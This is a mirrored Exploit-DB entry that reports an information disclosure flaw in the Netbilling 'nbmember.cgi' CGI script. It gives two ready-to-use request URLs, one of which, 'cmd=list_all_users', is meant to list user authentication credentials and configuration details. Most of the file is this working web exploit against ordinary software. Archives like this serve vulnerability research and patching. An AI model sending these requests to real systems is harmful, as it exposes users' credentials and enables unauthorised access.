exploit-db-mirror/platforms/cgi/webapps/24700.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

6 lines
No EOL
441 B
Text
Executable file

source: http://www.securityfocus.com/bid/11504/info
Netbilling 'nbmember.cgi' script is reported prone to an information disclosure vulnerability. This issue may allow remote attackers to gain access to user authentication credentials and potentially sensitive configuration information.
http://www.example.com/cgi-bin/nbmember.cgi?cmd=test
http://www.example.com/cgi-bin/nbmember.cgi?cmd=list_all_users&keyword=hereistheaccesskeyword